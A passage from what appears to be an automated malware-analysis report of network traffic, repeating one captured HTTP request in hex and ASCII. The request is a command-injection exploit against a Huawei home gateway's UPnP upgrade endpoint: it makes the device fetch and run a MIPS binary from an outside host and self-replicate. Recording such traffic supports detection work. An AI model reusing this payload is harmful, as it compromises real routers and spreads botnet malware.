3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 